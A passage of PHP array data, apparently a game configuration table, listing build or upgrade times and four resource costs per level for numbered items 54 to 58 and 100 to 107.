array ('time_consume' => 17280, 'resources' => array( '1' => 2000, '2' => 2125, '3' => 2910, '4' => 1255)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2770, '2' => 2940, '3' => 4020, '4' => 1735)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3485, '2' => 3700, '3' => 5060, '4' => 2185)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4165, '2' => 4420, '3' => 6050, '4' => 2610)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4820, '2' => 5115, '3' => 7000, '4' => 3020)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5455, '2' => 5785, '3' => 7920, '4' => 3415)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6070, '2' => 6440, '3' => 8815, '4' => 3800)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6670, '2' => 7075, '3' => 9685, '4' => 4175)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7255, '2' => 7700, '3' => 10535, '4' => 4545)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7830, '2' => 8310, '3' => 11370, '4' => 4905)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8395, '2' => 8905, '3' => 12190, '4' => 5255)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8950, '2' => 9495, '3' => 13000, '4' => 5605)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9495, '2' => 10075, '3' => 13790, '4' => 5945)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10035, '2' => 10645, '3' => 14575, '4' => 6285)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10570, '2' => 11210, '3' => 15345, '4' => 6615)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11095, '2' => 11770, '3' => 16110, '4' => 6945)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11610, '2' => 12320, '3' => 16865, '4' => 7270)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12125, '2' => 12865, '3' => 17610, '4' => 7590)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12635, '2' => 13400, '3' => 18345, '4' => 7910)),


'54'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 540, '2' => 610, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 940, '2' => 1060, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1300, '2' => 1470, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1635, '2' => 1850, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 1955, '2' => 2210, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2265, '2' => 2560, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 2560, '2' => 2895, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 2850, '2' => 3220, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3130, '2' => 3540, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 3405, '2' => 3850, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 3675, '2' => 4155, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 3940, '2' => 4455, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 4205, '2' => 4750, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 4460, '2' => 5040, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 4715, '2' => 5325, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 4960, '2' => 5605, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 5210, '2' => 5885, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 5455, '2' => 6160, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 5695, '2' => 6430, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 5930, '2' => 6700, '3' => 1870, '4' => 2415)),


'55'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1315, '2' => 1060, '3' => 815, '4' => 285)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2290, '2' => 1845, '3' => 1415, '4' => 500)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3170, '2' => 2555, '3' => 1960, '4' => 690)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3990, '2' => 3215, '3' => 2465, '4' => 870)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4770, '2' => 3840, '3' => 2945, '4' => 1040)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5520, '2' => 4445, '3' => 3410, '4' => 1200)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6245, '2' => 5030, '3' => 3860, '4' => 1360)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6950, '2' => 5595, '3' => 4295, '4' => 1515)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7635, '2' => 6150, '3' => 4715, '4' => 1665)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8310, '2' => 6690, '3' => 5130, '4' => 1810)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8965, '2' => 7220, '3' => 5540, '4' => 1950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9610, '2' => 7740, '3' => 5940, '4' => 2095)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10250, '2' => 8250, '3' => 6330, '4' => 2230)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10875, '2' => 8755, '3' => 6715, '4' => 2365)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11490, '2' => 9250, '3' => 7100, '4' => 2500)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12100, '2' => 9740, '3' => 7475, '4' => 2635)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12700, '2' => 10225, '3' => 7845, '4' => 2765)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13295, '2' => 10705, '3' => 8215, '4' => 2895)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13885, '2' => 11175, '3' => 8575, '4' => 3025)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14465, '2' => 11645, '3' => 8935, '4' => 3150)),


'56'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 990, '2' => 1145, '3' => 1450, '4' => 355)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1720, '2' => 1995, '3' => 2525, '4' => 620)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2380, '2' => 2755, '3' => 3490, '4' => 855)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2995, '2' => 3470, '3' => 4395, '4' => 1075)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3580, '2' => 4150, '3' => 5255, '4' => 1285)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4140, '2' => 4800, '3' => 6080, '4' => 1490)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4685, '2' => 5430, '3' => 6880, '4' => 1685)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5210, '2' => 6045, '3' => 7655, '4' => 1875)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5725, '2' => 6640, '3' => 8410, '4' => 2060)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6230, '2' => 7225, '3' => 9150, '4' => 2240)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6725, '2' => 7795, '3' => 9875, '4' => 2415)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7210, '2' => 8360, '3' => 10585, '4' => 2590)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7685, '2' => 8910, '3' => 11285, '4' => 2765)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8155, '2' => 9455, '3' => 11975, '4' => 2930)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8620, '2' => 9995, '3' => 12655, '4' => 3100)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9075, '2' => 10520, '3' => 13325, '4' => 3260)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9525, '2' => 11045, '3' => 13985, '4' => 3425)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9970, '2' => 11560, '3' => 14640, '4' => 3585)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10410, '2' => 12075, '3' => 15290, '4' => 3745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10850, '2' => 12580, '3' => 15930, '4' => 3900)),


'57'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2135, '2' => 875, '3' => 1235, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3715, '2' => 1520, '3' => 2145, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5140, '2' => 2105, '3' => 2970, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6465, '2' => 2645, '3' => 3740, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 7730, '2' => 3165, '3' => 4470, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 8945, '2' => 3660, '3' => 5170, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10120, '2' => 4140, '3' => 5850, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11260, '2' => 4610, '3' => 6510, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 12370, '2' => 5065, '3' => 7155, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 13460, '2' => 5510, '3' => 7780, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 14525, '2' => 5945, '3' => 8400, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 15575, '2' => 6375, '3' => 9005, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 16605, '2' => 6795, '3' => 9600, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 17620, '2' => 7210, '3' => 10185, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 18620, '2' => 7620, '3' => 10765, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 19605, '2' => 8025, '3' => 11335, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 20580, '2' => 8425, '3' => 11895, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 21540, '2' => 8820, '3' => 12455, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 22495, '2' => 9210, '3' => 13005, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 23435, '2' => 9595, '3' => 13550, '4' => 2380)),


'58'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1125, '2' => 1590, '3' => 735, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1960, '2' => 2770, '3' => 1275, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2710, '2' => 3835, '3' => 1765, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3410, '2' => 4825, '3' => 2225, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4075, '2' => 5770, '3' => 2660, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4715, '2' => 6675, '3' => 3075, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5335, '2' => 7550, '3' => 3480, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5940, '2' => 8400, '3' => 3870, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6525, '2' => 9230, '3' => 4255, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7100, '2' => 10045, '3' => 4625, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7660, '2' => 10840, '3' => 4995, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8215, '2' => 11620, '3' => 5355, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8755, '2' => 12390, '3' => 5710, '4' => 1025)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9290, '2' => 13145, '3' => 6055, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9820, '2' => 13890, '3' => 6400, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10340, '2' => 14625, '3' => 6740, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10850, '2' => 15355, '3' => 7075, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11360, '2' => 16070, '3' => 7405, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11860, '2' => 16780, '3' => 7730, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12360, '2' => 17485, '3' => 8055, '4' => 1445)),


'100'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 940, '2' => 800, '3' => 1250, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1635, '2' => 1395, '3' => 2175, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2265, '2' => 1925, '3' => 3010, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2850, '2' => 2425, '3' => 3790, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3405, '2' => 2900, '3' => 4530, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3940, '2' => 3355, '3' => 5240, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4460, '2' => 3795, '3' => 5930, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4960, '2' => 4220, '3' => 6600, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5450, '2' => 4640, '3' => 7250, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5930, '2' => 5050, '3' => 7885, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6400, '2' => 5450, '3' => 8510, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 6860, '2' => 5840, '3' => 9125, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7315, '2' => 6225, '3' => 9730, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 7765, '2' => 6605, '3' => 10325, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8205, '2' => 6980, '3' => 10910, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 8640, '2' => 7350, '3' => 11485, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9065, '2' => 7715, '3' => 12060, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9490, '2' => 8080, '3' => 12620, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 9910, '2' => 8435, '3' => 13180, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10325, '2' => 8790, '3' => 13730, '4' => 4065)),


'101'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 1320, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 2300, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 3180, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 4000, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 4785, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 5535, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 6260, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 6965, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 7655, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 8330, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 8990, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 9635, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 10275, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 10900, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 11520, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 12130, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 12735, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 13330, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 13920, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 14500, '4' => 7140)),


'102'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1150, '2' => 1220, '3' => 1670, '4' => 720)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2000, '2' => 2125, '3' => 2910, '4' => 1255)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2770, '2' => 2940, '3' => 4020, '4' => 1735)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3485, '2' => 3700, '3' => 5060, '4' => 2185)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4165, '2' => 4420, '3' => 6050, '4' => 2610)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4820, '2' => 5115, '3' => 7000, '4' => 3020)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5455, '2' => 5785, '3' => 7920, '4' => 3415)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6070, '2' => 6440, '3' => 8815, '4' => 3800)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6670, '2' => 7075, '3' => 9685, '4' => 4175)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7255, '2' => 7700, '3' => 10535, '4' => 4545)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7830, '2' => 8310, '3' => 11370, '4' => 4905)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8395, '2' => 8905, '3' => 12190, '4' => 5255)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8950, '2' => 9495, '3' => 13000, '4' => 5605)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9495, '2' => 10075, '3' => 13790, '4' => 5945)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10035, '2' => 10645, '3' => 14575, '4' => 6285)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10570, '2' => 11210, '3' => 15345, '4' => 6615)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11095, '2' => 11770, '3' => 16110, '4' => 6945)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11610, '2' => 12320, '3' => 16865, '4' => 7270)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12125, '2' => 12865, '3' => 17610, '4' => 7590)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12635, '2' => 13400, '3' => 18345, '4' => 7910)),


'103'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 540, '2' => 610, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 940, '2' => 1060, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1300, '2' => 1470, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1635, '2' => 1850, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 1955, '2' => 2210, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2265, '2' => 2560, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 2560, '2' => 2895, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 2850, '2' => 3220, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3130, '2' => 3540, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 3405, '2' => 3850, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 3675, '2' => 4155, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 3940, '2' => 4455, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 4205, '2' => 4750, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 4460, '2' => 5040, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 4715, '2' => 5325, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 4960, '2' => 5605, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 5210, '2' => 5885, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 5455, '2' => 6160, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 5695, '2' => 6430, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 5930, '2' => 6700, '3' => 1870, '4' => 2415)),


'104'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1315, '2' => 1060, '3' => 815, '4' => 285)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2290, '2' => 1845, '3' => 1415, '4' => 500)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3170, '2' => 2555, '3' => 1960, '4' => 690)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3990, '2' => 3215, '3' => 2465, '4' => 870)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4770, '2' => 3840, '3' => 2945, '4' => 1040)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5520, '2' => 4445, '3' => 3410, '4' => 1200)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6245, '2' => 5030, '3' => 3860, '4' => 1360)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6950, '2' => 5595, '3' => 4295, '4' => 1515)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7635, '2' => 6150, '3' => 4715, '4' => 1665)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8310, '2' => 6690, '3' => 5130, '4' => 1810)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8965, '2' => 7220, '3' => 5540, '4' => 1950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9610, '2' => 7740, '3' => 5940, '4' => 2095)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10250, '2' => 8250, '3' => 6330, '4' => 2230)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10875, '2' => 8755, '3' => 6715, '4' => 2365)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11490, '2' => 9250, '3' => 7100, '4' => 2500)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12100, '2' => 9740, '3' => 7475, '4' => 2635)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12700, '2' => 10225, '3' => 7845, '4' => 2765)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13295, '2' => 10705, '3' => 8215, '4' => 2895)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13885, '2' => 11175, '3' => 8575, '4' => 3025)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14465, '2' => 11645, '3' => 8935, '4' => 3150)),


'105'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 990, '2' => 1145, '3' => 1450, '4' => 355)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1720, '2' => 1995, '3' => 2525, '4' => 620)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2380, '2' => 2755, '3' => 3490, '4' => 855)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2995, '2' => 3470, '3' => 4395, '4' => 1075)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3580, '2' => 4150, '3' => 5255, '4' => 1285)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4140, '2' => 4800, '3' => 6080, '4' => 1490)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4685, '2' => 5430, '3' => 6880, '4' => 1685)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5210, '2' => 6045, '3' => 7655, '4' => 1875)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5725, '2' => 6640, '3' => 8410, '4' => 2060)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6230, '2' => 7225, '3' => 9150, '4' => 2240)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6725, '2' => 7795, '3' => 9875, '4' => 2415)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7210, '2' => 8360, '3' => 10585, '4' => 2590)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7685, '2' => 8910, '3' => 11285, '4' => 2765)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8155, '2' => 9455, '3' => 11975, '4' => 2930)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8620, '2' => 9995, '3' => 12655, '4' => 3100)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9075, '2' => 10520, '3' => 13325, '4' => 3260)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9525, '2' => 11045, '3' => 13985, '4' => 3425)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9970, '2' => 11560, '3' => 14640, '4' => 3585)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10410, '2' => 12075, '3' => 15290, '4' => 3745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10850, '2' => 12580, '3' => 15930, '4' => 3900)),


'106'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2135, '2' => 875, '3' => 1235, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3715, '2' => 1520, '3' => 2145, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5140, '2' => 2105, '3' => 2970, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6465, '2' => 2645, '3' => 3740, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 7730, '2' => 3165, '3' => 4470, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 8945, '2' => 3660, '3' => 5170, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10120, '2' => 4140, '3' => 5850, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11260, '2' => 4610, '3' => 6510, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 12370, '2' => 5065, '3' => 7155, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 13460, '2' => 5510, '3' => 7780, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 14525, '2' => 5945, '3' => 8400, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 15575, '2' => 6375, '3' => 9005, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 16605, '2' => 6795, '3' => 9600, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 17620, '2' => 7210, '3' => 10185, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 18620, '2' => 7620, '3' => 10765, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 19605, '2' => 8025, '3' => 11335, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 20580, '2' => 8425, '3' => 11895, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 21540, '2' => 8820, '3' => 12455, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 22495, '2' => 9210, '3' => 13005, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 23435, '2' => 9595, '3' => 13550, '4' => 2380)),


'107'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1125, '2' => 1590, '3' => 735, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1960, '2' => 2770, '3' => 1275, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2710, '2' => 3835, '3' => 1765, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3410, '2' => 4825, '3' => 2225, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4075, '2' => 5770, '3' => 2660, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4715, '2' => 6675, '3' => 3075, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5335, '2' => 7550, '3' => 3480, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5940, '2' => 8400, '3' => 3870, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6525, '2' => 9230, '3' => 4255, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7100, '2' => 10045, '3' => 4625, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7660, '2' => 10840, '3' => 4995, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8215, '2' => 11620, '3' => 5355, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8755, '2' => 12390, '3' => 5710, '4' => 1025)),

